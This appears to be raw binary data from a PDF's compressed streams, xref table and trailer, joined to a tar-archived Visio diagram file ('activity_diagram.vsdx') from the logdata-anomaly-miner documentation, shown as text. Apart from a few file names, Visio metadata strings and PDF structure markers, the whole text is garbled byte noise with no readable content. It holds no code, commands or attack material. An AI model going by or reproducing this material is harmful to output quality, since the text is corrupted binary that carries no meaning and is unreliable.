a MmĥhөU 5o5:#`! -zr7w^ /pbS8 )J8!~"K4JH%H:q:*uEi%(ALND'_^!oDvr";t[r>-Ү.x|@kΌaMŞT PC4֝r;} ` t&(,EwC`z^#~Kr)Am2ԲrǖO{ͽ:ߧuX0~;Xa^϶;4 b4us۾`dKM`,:bkft?( kp#:3RW*r\u>tR~d^SZMfx ĢzίL#,+^U swwSv*I)*ܔqg<^^w7E?&]ޢbG("Co* 0v Z1h:B/RD@ h~h"(e9#I8 3ɴ]w4z֢Ksft%.qhZ;|:"P:P3V j-٦$qvdt.ѳ !w,"٘~?| džD8_եW c ׫dL0\c}L:%L=*ےƩYZ$lqvޙ'dk.{sWgKq K~ "K"<*=;>Sԏ'[Y 4XY.5u͑Ko%u%q"%S0SR[5׳XdoX;+k|N]~SOy힟:ʫEw<̴>iӹYϥonEGIFݭX1TZ;դXamyɝz# 鳕+oSaw|( V\~CzG;pts~. :y9/#w)99RC\8=;Zwݞ?:oҤ4D ȩW^s>Qֲ ʸU|CŌ񍋽[1^Q*.ܮ0D]@գء&ZOom6>vE^b_Qt!z-5Dw{;Zƞ,Told&>2 Ll12{ܹ3brp{j~QZR}/[$mJޥEz~,CtMp\Ty̼Ϙ:ؙjۊ{op+NV#F ,b]H Iy)oJb9 MftF+mv櫘 'u%WT v\d,6bT[N!G[]7PmmjZ6~k~Ǒ"KyM(!@c.EIX#]CчG8X锄w/";đ\↞/.-_Us̎l:&SR|cE6TݐfAwBݻ{iv3DtZ*ks˷;E?tYO CROP"Ŝݫ}U˿zR̢  T{kmlR 9I[|Cca™=uv;fG5"񮟟=`,C} UPWp8oys FLoj3Gc6JYp }M.9/z]؛ۆKqրexo`'T G וmd&_E,_`+321rEY+1)2? Zad>d'YVJZYQv+>MϷ5m@SjstzՓ)̎/Q_koO~m=u+Qims\Zڝ;+YӋDZݣrԆz-zsߜ bK+5#Jj_tj-m5 c׼>S- u 6R&&9'ӳG|T!1z;j=3 [K*$!DADap$+XbmI}Ic_qL/pxldZS*ymɬ \gnFelg=H܃ܻ++d6f,X󱅷KL=6Oӏ>b,-\4t:j_T>wKr5`pg®Gmx" ҵz~r8Lq8+Xn'!]k'u ӫ:|+۸އwƮe1x5x!Lpsģoߢǡ- or(\JL+xr|4u@QCX5OTbw24Pl_,kx-) >W$ZS~  i endstream endobj 159 0 obj <> stream x]Mj0:,EҖn KcWPKB}GJH<}Ûz`:08oaIy`7U38:gZ?4?9hC[ߒSG[b } zUObRuG̟s5  &GdR\CoB>/\eJY,)QzrG!_q endstream endobj 160 0 obj <> stream x}|U97-S23I&d H@ jBK0J(kXqd@ P+U׶Ul6rshu{My~'?Cd1Ut+ngƔʡ[><;L[5̫_pC63V_6ķkŌy1̙]?c"قsZV~l9e[ǘG@~pHW ;ES(FRt,nǙuv݇+kb7}?_mښƏ;f#(:$T6AW\TX#?/7'Nq:69d4uY@U/W/@=9">N,i|' JdhI b z*_2zSE9њi ~?j*UFln@{sy\Ѓ-H~`A;5WhW&Qs+#TVxZʵ"Qk7W]kﱧU6DzTjS+6FH@ErSG2 >G|v>1:aB!&K7E_.YHDZPfy,T(u"gqEN9Z.KUY>i+׾s|_Dͫ,-PQA6&Z޳0bD ")TXk*jkՊUV~**]O{}}}X_V+I-ǢU4Ύx<؟}5$T 4ՊU 8"ZIea1rcWxZZp:,+:t{,JuB;HE*kd%OO܈鸶p=gFE** cT\&e f4XE/jMPh\km}GN ?F[.tBK(a~d˄R=Xeô𓲫ev@b+{ڹ&FkY_GYqVUWV:=j[PY<-PX3ȣu~BjJ$64M)lh{7=ϛ8f1yj Wֶ fUW8E' H]!Z\ i>qСACG9!YZ|T:?VڄqdLLpȬB !bS0g7&pmӎ6'hڞZ+يzԇb5FRоCa>5VDo,kh  F|ʱ"qbjYSEI5=j8KӀ)5 ^n(7Laֆzu 8A$X (Q 6R[WG  M}xPQm[R|p͹%olb ybdžymV0ñ@}B7&n͎hSYn[KLB,&.나 g[R !x:uxU7O[zRjECT0!W# z3/>ݘ{̣}Ra*z6&2NΓ %b|”T] aWyDm_DT[~ F!um#C<ӟ<S)"'R|,GR|(ş@xO?JHoI )^5)~/ūR"R$ŋR >)9)))) )bIHGxHx@-.):)}R+)K]HqwIqۤ)JqIqHq7IEA른NkFJ+B˥LKHYHMR\(RIqIQ RB^{py嵇k.=\^{py嵇k.=\^{ER.?\py.?\py.?\py.?\pyk.=\vpym.o;\vxv!:u^ܙ.й:'=JDՔZEtJѬ!Ѭr23RJ-&ZD΅ѬDΠ"ZNfVN#KL4hv4DFYDDuD3fP锚F4h Q-Q ѩDD&M O4h,DFzADãaDUQHPe3 TATN4PQLt *9hU/%*!OԏKԇZMԋ'5VDTH zu#'JMR9D.ԴGDDYDDhP:;1FJNQ 9 3Fd< (LDF"C4}HMT(ʼnFVԏDR;o'uOR_}E%}Aω}Fy}LчTϔRSODޣ?Kw&zM*JAz4TkѴɠJW^&zE*>r>OѳDP"DO=N1*(!C0=D 9 h7.*RKh{4 NE!.;.xKAn'V[n&h э DQ޵D]MtURW]Nt]JLt1ED.P|6mA룮YuDk٠sΉ ֨ u!ZMWQVF]T}923-!ZLM/ D] TrQ DͥzDsgzQ#l ETOTG4h z:lTjTCt*uw2=(LL"H4h|4%MOM{L4e-ht44$MWSj80rVESր*)AєAєVhRhQhp4 w~ EDN5JJaQg _9TLy}D=@dS g)fQ!U/' Rc݉QcD]rN1K9Dj |Ԋ(eey2ң w1uR*8i'J$YJə@d"2Jȩ)D:G FЇ}w7+5BK s"/H| ||8f#.oa;5m-WmyW_//<|y~ily>ak>n݋GGP|> <^@v@;mY˲{ewewo;m[Q&oZu ںm]ߕeoP<{y"&m [\:Ļx >;:fe5V:d0 mexExYxe6[Y>sҰni%Kտ-ۖ򊥼RuIxQxEahܢEEE-R"nܳ}' ZZ^m~§sK愛 .i 7mk 7 חԅgL6=pgCZ9?8sq9?8sq9?8bG 1#p8bG 1#p8bG 1#p8bG 1#pq9>8gs}q9>7xq3a3c;r `d;-f6K-6ma߲{=^ vd~;%3yہ}qKJy:ȥ#$fڔ+?y\;ڮxÑ{l=iƳ)l*Ʀ:V7f63s:kaZ lf‹Ћc)PK/e𵜭`+Yl[\yV!g^agceajJ2yֲul=Vm#;6v|gRu erv ZvI+55v#Ȼ5%r`O{v6 59/9\9X=4ˎ]-6{\3c(JEIjA،1>6"J]Y%뎛kP'{N_ bVԍ>Ѳ[-Vvb$v߱mN|+]EX;lV>uh_)?zԳfc< _߫'aقŁ-ŪaS,C -e!Ÿ˂h&سW-wR1RwקOJq߼@DEڧwH`ESԱ ʚ@> {͠W2Ir*2F72˛Fg+5+dJJue9'Zx\r20pZYz٤ lwzdΒpINk~Ŵ\L:YzJQ>>zN2dc`r83QOh;fW&3&W pnnHy |*vդ&YzX,_n8G7Sa SFc.>;;|pu.;jߟFǕqӐŅBŇiuz/bqwO7q;ݗ]fai,*DfnefV,\1jJU>}_Nd72BQhA3-4P?V(|TVW?_ޤI[cIW{6>*utϢŮ{#JQp&(nyyyK*tm$Qf~59#)#f̘SiLITI_/֛ >÷tlP GƊvnmoWjݯ$arH3̬~~o]wi=P,II6Q=|NgᔙC |9IoDb;KBCD} h:PaGHD[pEqTօuZWVqo=~w|#}Ϲ6_6Y;XQ"uoހ<-; Qg?glZ6qu;5m͑ԦIp&_O7FN0l4:2"5K3@;<ۙ\\X vGtoЈ[}lf-ֱ#\ZzPc\kGWW7[nNp8vn΍\d6{ƳqPl\qcƁ9Ǹ5VU'Ð/\y6 ſ-j5YLǵAN4=ш^p:;;.h5N\;X&AiG'Wk7trQGMfNCܓ]5elg͹j8XpzT.σvq h!Ǿ#®=bEww>ZK3,*6,9`Ah3C f0`[f0`3 f0`3 f0`3 f0`3 f0!2~EM⿼s=lKb< wmM-lۊho1m[e1۶mt˥lێhom; r:dcöI²)Ͷ9[!nn6ǂs[¶&D5lۊpq `ք mC&mnٶҬ۶6ȶ%H5Bö;3mL30vf|qL3f̴;3mL3Ӷwp:mΫ "h"V~P:$0b5=6c5㝦{oa*֋wSgdWmk?NY='W'jPW$&.i+Ɠ^#jĞ^T1@;3Z1\_$uLTeLu*qvFYKar`ψq[JW \Ý /p' 9>Ɛ0 w.[ԝ 3#рFifaOaN' E*!*_璍;GgraDdlwYVù9e~61WpPsi1QW泿F nr6Kٽ*a*,i͔Ӹ&+} ukb#~hzDUM lp_m Vk*pu }Ih[IeJki.a|z\w(a_׏ig44cy؎яj.L$wij.CbR;Lb s,ΜFN*\# UP'ޕS\*5Wjp0uf}FB`ARL>+2>b=m6SIq6dNe \PH7,EW( @q hFdlx`lXl:mU02L@e. VR9x46BfRpUj=2L2ۘvJA(Euz&9Xy>dbTJRtjKEIqQ(;"o\jlRZ*TR4؟%E”*ID%$ a,.12>-*.1 NIbȒ b BQd,t#zǥPqf4#Dqi"*9M"Q@61.1Z\ T(0F ӡCFcVi _J&G a$/dXRq **"!"FW%Fc+C/E%%"5"SETҾq)B!KA%ydNXD!C@Aa,Qˆx"ۛo o 5n [̷̷̷̷fs- 1&0&0&M{[xFLxaO>WΎrc},!|c?[FPa|r! TۋhOqI ֤q5^|kz4XdMSXX `^R d5FkS i9NI,4Xsd' 5]aMJCeeEZTW/VU~ \ϻT^V$iíBl_\.ieQ^^neMZ)Sڂaɂ%H(-Gpv5%&Z̚vڄMsDm,f=w+Lk!?n6ghО*3Oz7KXy[iqɑn^h`bk'/ "g߻cFN΍xqHaaNd*֝ zQjV;epKfܸ`#gó'^UBD|m4#oill![ݎ-M2*Eoڂcѷuq6 h&ui";}?F%ea/%.++uّ:--#<χm޴VUwW%9s}[gьĢ-1-WVx`-v?.(2||lE_To+hk=󚬮p~5im"ݶĎϟpىEݛdiK۔dwY}0MVW_~%}X/ ¦_E?i{Όگ,N/ݬ>vӺ˾F;8&D/?h$tyzXrQ3m񁬉;8:riiqnqpվ]Z ~٩p8m"]ɁwVS{־u{!Qs&?3eZ~zhpXWLf#oUeNz-}6ne&Kզ&x&['ڭK]E~D`х5]~Q!loȟZN}̢z/ekk"+iGcƱayDӑǃ@;ٚB.梙tѴ&kH.e6)s_Bobuʗ_F'3E!:TY1ǟۛ(ゐjRbh:ʤ 3gbG$C#`kՃQ/޼.O}MO*O5^:U/H"<WnoeOrׅʮ6^yr!ik7 ?]FC~xY۴ּxZ|'W4;MϱV,}d :o {гFv=xGx皽6~n1C; YQ=?;m;}x{l@M2U|6~>iJk;şz\k. gBٲcןWոODS?dGeƄKz),hU؅μճ[:y:T߮}l_qqÝ;Fh{ao7 :bxyc4VuMSe\9oCۮeaTSkK7._SY>7s[Rvwq["Ђ.=!eIPYYSMh^qyi9-GR0.܆E%K*ifC~̆"DvbFG Q~RyvpP@=sBmVKz6os{@T۵C㳶o<4$I҉KQlX!'j|c#GZoen-ng$j8cQ[]QAF)\V% _Q.q;㋧W/ZڟTĢB_ZIKuͼ{iO>8.=t⎪VC|=v^^}iz3[hhɕOMoKm~90U`>yO;rrTZ*o{pڞjKڛmjvGGcKW^so //l̼3otYrTVC K/VY3C0GXҞ&jyd~|y9 %;ʼnݸ#\1ĥ3%SjwfM8<6D iIDԯoe+_gNX$^@^BLqCBM*O(=![صY%CAA 1)s":N4)s=?}.ZxEetQ)]4h$.]4n`!]e Lk $^I0!-(O"@qA|z:.2})w]e=|ޥwgYmtY2{~ϹN#/Zr]o;fGݭC 9jJtrYٟp蓞SD7ʹw፮͗Wm顨#9Z1S?vڟGqv kg)o߽}N8IKkjY5Qt/z_v ޵/fӟO/ :SyRܪa_AV9!Ӷ23x]F WޣlY`QƄjOIDz 5=}Zˎ>Xqu?7lK,vDp,^Asg*wTܺw– ..kÉKy윖k^xˮww'l~[7g*solxr];.^ҵ55Jɬ?/JOL]طuE~V#Glbѯ(YXaUC G )yUdNr!~dżt1o-$9_)/ڇ@;;/ E]6Ё6u!*Z9gT]d]`:Z޾_CN}0 ۼwg"jPy$3}oxlc=sABÜNdIr5o\;P򚿯S[hc?̖>w2&~_.n>nV}ƨWvlW'nn_$]vŁ/nxY{+Z:Pbx /=ͭ#FZF3#_ l^4-Wc'wI6|A$N:ncnrttޏ)vNޑ.+5R l5Ǔ6u>s\` wi3iH1$q"c`hP z x+"#o8vS]T=~[ J`Τ\wm v=0ѹ|MB[AY]9wzZb,(2D!&aND oH BJq*RZ-ID! aUy~y~p_e[(fDzfaAvGcYϺ㲗 iqvDyΤ 1SLU]ލ >6jk]Aۣ }XB,n);B Q:YLv)u19܍Dc endstream endobj 161 0 obj [ 0[ 507] 857[ 690] 895[ 303] ] endobj 162 0 obj <> stream Microsoft® Visio® 2016 Landauer Max Microsoft® Visio® 20162020-11-11T14:45:05+01:002020-11-11T14:45:05+01:00 uuid:178B2C64-C36F-40E3-8C4B-F1FF0D7777CDuuid:178B2C64-C36F-40E3-8C4B-F1FF0D7777CD endstream endobj 163 0 obj <> endobj 164 0 obj <<642C8B176FC3E3408C4BF1FF0D7777CD>] /Filter/FlateDecode/Length 349>> stream x5:qGQ4PI>sBJ@HIiD\҈JشhS`Ʈt݁,9DQ 8FQH $iP0(7 Gd:PePA4)|4`s&57T-CiHG&#YX*`5`-rcD!Q [[ Q؉JnA5؋:b?qpGрF4Zp8ShiA;Ρ 8\@.26:n=MB.1}<<#<< <^a/cx#>c0fhx|eoDM&??)QD endstream endobj xref 0 165 0000000018 65535 f 0000000017 00000 n 0000000184 00000 n 0000000240 00000 n 0000000519 00000 n 0000006663 00000 n 0000006716 00000 n 0000006769 00000 n 0000006938 00000 n 0000007178 00000 n 0000007310 00000 n 0000007340 00000 n 0000007501 00000 n 0000007575 00000 n 0000007816 00000 n 0000008082 00000 n 0000008145 00000 n 0000008273 00000 n 0000000019 65535 f 0000000020 65535 f 0000000021 65535 f 0000000022 65535 f 0000000023 65535 f 0000000024 65535 f 0000000025 65535 f 0000000026 65535 f 0000000027 65535 f 0000000028 65535 f 0000000029 65535 f 0000000030 65535 f 0000000031 65535 f 0000000032 65535 f 0000000033 65535 f 0000000034 65535 f 0000000035 65535 f 0000000036 65535 f 0000000037 65535 f 0000000038 65535 f 0000000039 65535 f 0000000040 65535 f 0000000041 65535 f 0000000042 65535 f 0000000043 65535 f 0000000044 65535 f 0000000045 65535 f 0000000046 65535 f 0000000047 65535 f 0000000048 65535 f 0000000049 65535 f 0000000050 65535 f 0000000051 65535 f 0000000052 65535 f 0000000053 65535 f 0000000054 65535 f 0000000055 65535 f 0000000056 65535 f 0000000057 65535 f 0000000058 65535 f 0000000059 65535 f 0000000060 65535 f 0000000061 65535 f 0000000062 65535 f 0000000063 65535 f 0000000064 65535 f 0000000065 65535 f 0000000066 65535 f 0000000067 65535 f 0000000068 65535 f 0000000069 65535 f 0000000070 65535 f 0000000071 65535 f 0000000072 65535 f 0000000073 65535 f 0000000074 65535 f 0000000075 65535 f 0000000076 65535 f 0000000077 65535 f 0000000078 65535 f 0000000079 65535 f 0000000080 65535 f 0000000081 65535 f 0000000082 65535 f 0000000083 65535 f 0000000084 65535 f 0000000085 65535 f 0000000086 65535 f 0000000087 65535 f 0000000088 65535 f 0000000089 65535 f 0000000090 65535 f 0000000091 65535 f 0000000092 65535 f 0000000093 65535 f 0000000094 65535 f 0000000095 65535 f 0000000096 65535 f 0000000097 65535 f 0000000098 65535 f 0000000099 65535 f 0000000100 65535 f 0000000101 65535 f 0000000102 65535 f 0000000103 65535 f 0000000104 65535 f 0000000105 65535 f 0000000106 65535 f 0000000107 65535 f 0000000108 65535 f 0000000109 65535 f 0000000110 65535 f 0000000111 65535 f 0000000112 65535 f 0000000113 65535 f 0000000114 65535 f 0000000115 65535 f 0000000116 65535 f 0000000117 65535 f 0000000118 65535 f 0000000119 65535 f 0000000120 65535 f 0000000121 65535 f 0000000122 65535 f 0000000123 65535 f 0000000124 65535 f 0000000125 65535 f 0000000126 65535 f 0000000127 65535 f 0000000128 65535 f 0000000129 65535 f 0000000130 65535 f 0000000131 65535 f 0000000132 65535 f 0000000133 65535 f 0000000134 65535 f 0000000135 65535 f 0000000136 65535 f 0000000137 65535 f 0000000138 65535 f 0000000139 65535 f 0000000140 65535 f 0000000141 65535 f 0000000142 65535 f 0000000143 65535 f 0000000144 65535 f 0000000145 65535 f 0000000146 65535 f 0000000147 65535 f 0000000148 65535 f 0000000149 65535 f 0000000150 65535 f 0000000151 65535 f 0000000152 65535 f 0000000153 65535 f 0000000154 65535 f 0000000155 65535 f 0000000156 65535 f 0000000000 65535 f 0000011643 00000 n 0000011953 00000 n 0000057900 00000 n 0000058212 00000 n 0000077900 00000 n 0000077955 00000 n 0000081304 00000 n 0000081350 00000 n trailer <<642C8B176FC3E3408C4BF1FF0D7777CD>] >> startxref 81902 %%EOF xref 0 0 trailer <<642C8B176FC3E3408C4BF1FF0D7777CD>] /Prev 81902/XRefStm 81350>> startxref 85361 %%EOFactivity_diagram.vsdx000066400000000000000000001112771437606560100350040ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/diagramsPK!{Œ[Content_Types].xml (n0Ub˱@xmhYU.Aq<ײJ`*'GPBr9}KI/PE5M$v^@DȠ_aX\KČD<.o%KT*9n.Gao߀F ɄY$fKˢ\ Nҥ&㖭p32Ʉ%;Nq3ij$~<#1q={}k}-8?Q/R7ǃ**v#9KT(`)&ΜXmV \Pz;'{"6\<>΁DzZ9Wl PK!Xµ%^ _rels/.rels (N0EH}=S ȿr)`D T?qn6nN N =PxAv4d{d!mA@/'iHhhg =Ga{ıhHg;jjvgz)V WK1{㣣)Fw_d: %~~wQxƻ8!nQx7۝AM= z~c2)HAgï8Yª6:FѕۍD#uk`I.L@Cl,}eҐfl9Z-d`&|$qyTK,&CjPsTP yoA$pemZ?6ALѶڝvg h9|EAKts7*ƽ-vOi|IUH{f!th̲U*mw,ɗVw:NZK )l`7+HyrC8fnQ$%*R(@H#X IL i\|kcYXN"pdm4Š㕯4MVa/61_{%Od.Lww 8~x&͊3W$,/|4|\mOjuxF,(*Q0n1qkGArD]p%⑂Wu*D 7f`ܦʳq"UЕ .Fg[<&кϖcIJ9&/I'f@E\eK!y`=N=KN+$*~(rRn] kӂu1 Gwc:FQXHǓdU#k*s_[[-` %(Y<@+"\V)*ș{^* s*~ē6mzrs%UNYKe}Lɢ>i0+rJ8-ufvX,gSa=ɧ,"*J%R)PW1'ܪp sAf_i[0D9:CgKURo> ͚,; R]\t.XF6l508IELGz]u| ñ/S-_/]f䫢yiVUˌ3q>DVcD 0s۴"DCP̅\<ȥވ%q4u@U G68h<+fe p "lR=Q%*X,Å_a-TM^8JF:mr 'v{{uuUÏ"0э+/ۃ6UZXW]}>hRuwVmк*$ٮ1&וFP݂e_;uopZ3+%SQT5H,: ( )`e0Ux! p;E=G g#U/rq 5_C9Ìւ[ƕ&0cM9ab+c M9m<:2h T K yXC: 7zȟDv?w"i^U9\eZgwEEc Z`#AvUmu,[TfhErEM0Dx|j+TJn4pQ.u {@ਊp9CW.u7 C'Aw y:л>]]6UHK=bXd8]R/.*z7NϠU8OgQY< R*W=FAj+[qonj}wA_w!x92XLDʄ{%\]@N)Jr>ʏR9`<||HmF$8.=fC1 8u*X8-['lѠAn ZO! xҕ[jU C앝0Ͼ:\A\e aG$LpՀc:ƧsqN@@k4X<:$L9(xwLR& ܿo:[w{8>b5`oy )I "jwar%ny74qɧie8ni4;w8q_ؚf![c@ˌfԜfYm ˶e*za^{̮(q4n8Rfk={yd)xVE@7K^ ? ?k$w8Ws~R4k Pc*j5f P8FY΅c6:QSyRhEu&x7C/5c&<%s[\I *]UG~å$N - UD1uΒ[uJʸZŸ9Fԋ3U"]|_bODa: R佟 u})',V j!>(Zj-7f8g zF_eR*r ߰y˂)]0r Ju z[fҕl][^&N2[ 0 Mcfptf53Rz3`ӜHwf-֤=3t&Ai r:4sҢL)=A8A3 Fnv4ӦNi P I@\:r^WJn@,}@'Bl R%_Z^TI2/&Pqe4]C6 IPJlT7o[Y&q=ϘxC.*,OƄ2MBD`? Id@r\9!U+UM_I>1%㣌W{lfh0@_,o툨wxk <<7:6Z׏ɏ=wxLլi!r_ܠ(zLZk8 .o0X["}٠%4Qtr}mUD)Z&YS#[SdM8Yӄצxbcb(CmQZLnTX*N-N0Y\tze;%? hXZ$N/cy>a|z+6zzŜ\͊mL?LSL}}YL+tJ^ 7Ex}r0#*Cw#ͦ⚌&iS0Y &L Aahʉ?UX ^MgsR_Wo{mMWkxc;Xr@ ;~l 4/" /NHw@R!8C/';Q(}f@Oxot#y9lmUt8}IGM WdKB^ 4~elw_6{/ =ҫԾ3;[Wם[-GugwpK̎р1=M q`6rRHj'?15Ty i7yn3e= L:TR_3q1 IßߎYkt5P8\^lyY]4G1w]<̣={V\r -6ۓC =XBK0WI`){Wc[6<b`[j*0 X2NI~c^dwk͙VrUꦼ l5@>˰ׯ˱ G@_OFOUh9|>5){)<PGUFALDA@~L5$ΗOpA7dLC9VpW.0-|;9_p_y~_oko6]RF $zAXAKIHKB2wX \u?3WAx[j>|7?עelP F :PK!:Y ,visio/masters/masters.xmlZrH}w7lYW.0(Ik3o2i$76?YTv{vv"v)T*KReqïe'i;uʨxuUϣ"{x1ݽR}&4ۦiXvӲ e9'^fO%U$wMee9"qnq*ɗ|%g%޿ v&p_{7}C:/Vg񼈯rP {$['ܔx|2e7/qN𲀛nx{ O,zʗRaei 9"B2 FZ&c&=]ʓq A=CWPF7{g#J( v![1)+[:k^z2KJVA+NV>A^"h /+(?Eva ,4۾ִ[洭n dv||=,\"T"sM` FV",`NC,L34uzTRk0`I1T~EoHU,TtNe(1J ,b bm6*ae%Ճ,˼c5qf[Qe!kE DyGtD)dB5,^Rbr+4(T;H_'1 ci:>yNLSx#A4ӱ:yPk7EBk{@&}cEM' P  ^XH:|[<!Y6І'@LE:2ƒ\ >ᓰJX68c|aΫY ƕ"J‡2X-0 _d͞" SѲ.ʢ^rD#j!s=mf#Dzc?3`ll:qY3{ݶuS9x0g> :KhT &z9e?%QZ 5jFGreϠt~߫)h` Е h?ѥqu=7LGsXb\ PMr7-돆Z()J\Qq\7yNQJ1(T T~)/qN"nS[8xRRu^{YFPѺ /n#jkuȊG7ԁ=U'@_@= @á`sۋ \ DYis XCNywD 6Dl4EsICJ?T9Q+{ CTvFXh7T yqb'-)L9M"ڔ#8C@jRQ :?$WMVBzQu rU6M՞+J> 4 ~}9-j`] 9D~̯bP˅m( [לQHDJBy(\j8?S;l2/$*ޗ F;J`$+'fCy T0Ab:K!WyEC}AzNB \s styPd?3у?, p?i,8P.JNEc98xŒP#L9HsX ̞82jP%;ͿPK!?visio/pages/pages.xmlUMo6MXߒD^dfk F#D;d"̼y8VWDK9Kmo)ۤv'm}#@k!]J\:NPvT\rEAsps:NM(Kq`&qR򼫁ILƎHdٖiu˶!9v#{YZ>H O_xgjIk x n(ԎG^$LI$ cߝ8Y { ;ѪzZ›<|Mn7%A2? 7cw1ORXdGI*:H%0Y~E E];<bwm U|wtKQJiP &HMIzQN* ^a,w 2yW!n6 7Za3D?c%]Q1 <{M9mT4'#ӊVTNk!wwtp6վa&ߑ\}&Aھ  dN&=uT2Td0YG*S[fl olǺo\~!aw$#&/1Go:%qxqDaA?fr.XQ0ߘ""Dvh]=3QPv( Q/rR٫utF,瘔tsKAUtzkZ4%.:lk[]PK!Mvisio/_rels/document.xml.relsj0D{-;-ȹ@%!mQK+$%iK꒸$vx\}A1&K^AU j|l/ R־yTpnQmH]|R^LGSA=ߴurQ2^z@=FA4 ?ΚH\rro9VToDQ(x/m.sx ZߝsQy z>j[kΡ3-y#V;۩PK!#$visio/masters/_rels/masters.xml.relsj0 ``t_No^GQ˔+er >o~RWbT5( 6. >/oЛ)p'ctģKXXJ#b ')2_f lt:߀:ߓ9^JeǫHQ5 ei]vDoC9fӄ ؙ.Lvؒa8tLU燂/o Gc*ۏʪtfQ*~Wo'`KLiO r- :Go^H8uCŭ?/hht1Yͩ D@ Ɣdp*pҞ%Rh$ޫ')7ʵ܄ɦA a(!؍$R2e*.DZƊ??-4oɫ:!ru eA :n=rZHmAQ1`*'& w);~# FkmHtUmu?&QVV"8ٿN)94ł=–h̨mFΨP]wga޵^L +WmWQ٧w8eM4ޯgu+]Ja2l3Ù_W7SiD~$~]˩OmUXtRrgz[>fq+Qӵp0<'_PK! ޹o visio/masters/master2.xmlW[O0~ii;j@D;FC)K]-#'_?vӤ&>|c{DL"<2ѝ b (EQ%64Q&Z=JH5:Y,{̌aZz }Z&1&wĀxːeFNQ,q­'!%#xПn F pV1;ŷ 8I xZ91-Vc`b @0kw[FFiBpe÷>|OZc5FvnP=DOxEf5ږenzpjCCkuvuغQt j4.T%J4&Kcghfi;TPg}sr\pQ6]jji&Óm|=+(e""zrkQD\ߗA5s)Zj%oƄ\PB{8%! bj3y~siKIvA_`8&4&gp+&@R\ˢ"/c;31^$يqL.2sL?y2:Fϑp)]96Td`tcCC(rF))HkLkΤ—EKdpLbc҆ZSvq,FYk*`a6RҌϒXՒ jkeN>}VQފ$\rHR֘Tdo:'ȍPW=ǽ#c[!,y bꗥP?-^kuJM%:6Uu97:4?GobDYPK!t visio/masters/master3.xmlVmsH~UMI*f%Z&+F?]!27À jCR0O?t_C&D] U'km[Qv?hD)Di0(Aw^ȧ$!TI-ôC*|7!bBC/M4B9Do! @kRF7 PdhwIUc NŐqU剢-<_E}̜2KUtٗ  +itvj6q__}seuݪz`K<xA44eՒ(WF%6H3+SˊZhE"Lθ\]DOh!ϊyHѷ+aŢLО8;A/Lɺ-T$ۉ`v(Y˸mneehgUȨL}OjerjJpq?$G8:hZU: .}ME,ܗq8zxTsX)J64U}2L7Gn(Umu*ύ@o)A \OiU»,m U){񳞇П|6$F~v%;?d0dlLs0CS]aM1e~#tٚd1F)>W*.;>7i0T-$"!GH`N!\ͼ 9?og' 7ZlѼ~CRzϵ)gY0hKbllMai^sܹcO5gd?xMSo|ToкɆQieVzϋx1ˌiz$"CSY_ۖ\ nWDp2%N!˒fI֯@!ug0'C]%GϺ, W:>PK!2uѕ visio/masters/master4.xmlWn8}/b]$-_jg^_b7}Z mDd$E) ]? 93ssF>pG3Nh– I@oIuNl|8MN,. HOl!}n$`Ӎt!r' lO؁5Mq"q7že[1.n% G\ S9fwB?؅]Tҏ ^H!(z\y^"t%In X+~miwڅ+?'r+B}YNN3Lx #in0uT2,ͳ6YeiDҌOm|0'A/3|#խ|zvXN>(4{bu hSS|G}jQ%"2QJbV]Fq{Go>#uN Ք#Qfnb~>m\\/lGtVQ)5(yɏ_*СQ.%t#5VU=+v3MIքsyu =$udDVy E.`DYJ`(Jr`R+(TBv-eRVR{֭hgRhR{]kp)8Q=Oy\lru βG#DY8Bu@ݪ* NFϲ&M,uzK> ?+1}>o&yqIfKp 0tg6| ?˳v o|\!*NŘ4vbyG/lQEY]fM1Ij)Vw4t# 8K˴Rxp HG?05iM vNVڡg-*qҏfpŘYiǚ '12*{,S_T̢k@p`#f+Ѝd^zë[//vbm_(Gb)t"$^3AGOv~b ao8[n'^x?=|ѳՙ>~|AGNr:6.R R4ĄL8<qj{`о W|g6`!=_m uBꧣWB9xiĆqޤsNRIuI3x= z֟D:1& `@@6~QywAWҺ* I`%׾c|nCvES1t` 'vh`'fT,I&e,;U"OhyNh 8͡"UYYp^miUy˫A$8 t2Ic5U^T̾3q !P`OpeKǐ?cќ9MRk'dlZuZxSyAT)}XYs")o^w26zǣ`C9Ҧ̭?1^S_CcͮO6̥'gNU뻒 M_kM~sm;cb> [sxU0n5"Tѻ;x:}^ ll&%5jMVPmN2Qś@S)G{INe0VuNIMSַ"S:pE\ϼLȘ=N2E?),@ xK>[Y}{?]NּYxsʢ?lvy^tGX%~>aKVNHuUQV5ӏQ%S2n*젘Ȇ ; ۺIuC(#e<#E^ױKНU"xhvu ^ DH$mJg %kae DiÎ jvF \`}DClioM'ҭ}'3i b iQ\h[QeA{",46IIBuY&Y3Y6ݚPXC"2l|"O~LP^@V0+&pFNSee 0LktK|P6eYXV`8Z{l=\xQvƶx /=[pI={OiV[iK=lLotlAoc6%A?ZnޯR9y/eits`!ͧXEivFN1xhx0jwCV~~{{jZ??{w]lV֧-=9=-p.^u҈[ גֿ<=L/iڄG^h6+{f/C]f0(G$qma(  K &>VaQ %e% !5bwMJf}]'f}SJ K1IWDiRj>R7-|qRl 5KTPt""ԫ3Pt(AJQSn\! -Qw/I^":іB% \WY`L=hlwzz 2z=A{rECT@Ti5"% |SJե ErkLmM8^3 {6xϦM8^ja)8Lt,tG@*1cf=Qppa."B$2س䘅3AިFyxiߚDE#ʓk0 L0T5znݻ!S& T}Lx5RL&j i ImPy䦕l]*1iQa2*&- tqb8]BYKLҩ)FT^KUdf퟈4AB$@ldp(%~A@EzEy<ؕ$6RIJSU&/gi΍ue H_ MP`՗xL#$RkPJUjkUh )̫SCHm)gf5XIFeJ. bggNZVZTe7J7 ##\$&Wd{ˈo曨᝙\M~82D- x0$}L!;]MoP4U `/eeO8QE hyL"пM 7CVw{pPr+ޟ*+ɑo\yeWYIIt"-f-yz]E2SZ7P2~޽2)̚WUn(b{av@⹄_eV>/ۿF{ir D(A{ٍhI}Qndo `O%)j$]y%d1*;k Y?ٚoM*4Jxa#xGЗ̆IOT+)kEx3EwI@ IZu/Z|i˹=]ڴ|T,P.CWQ^dHtUڸ>C+.a46[~%?[ "kʔ3mUWpI%ZS@UY\9~.,^Fil]FAIFzs:]Mt8JU+"R;Q֧j;NS+jAn@+|BN)($T4D^ޘcbakA4 >%i _'.X(^2;ǮCL":GDG$..HxH5dMwO$l\'tz-f!بZC@X-B=YwV]_3y7%ꋾ 3WNawD-E 4CEDr<vT1> rE& .~q<ŁQQLBNI bԲAvٗ{) 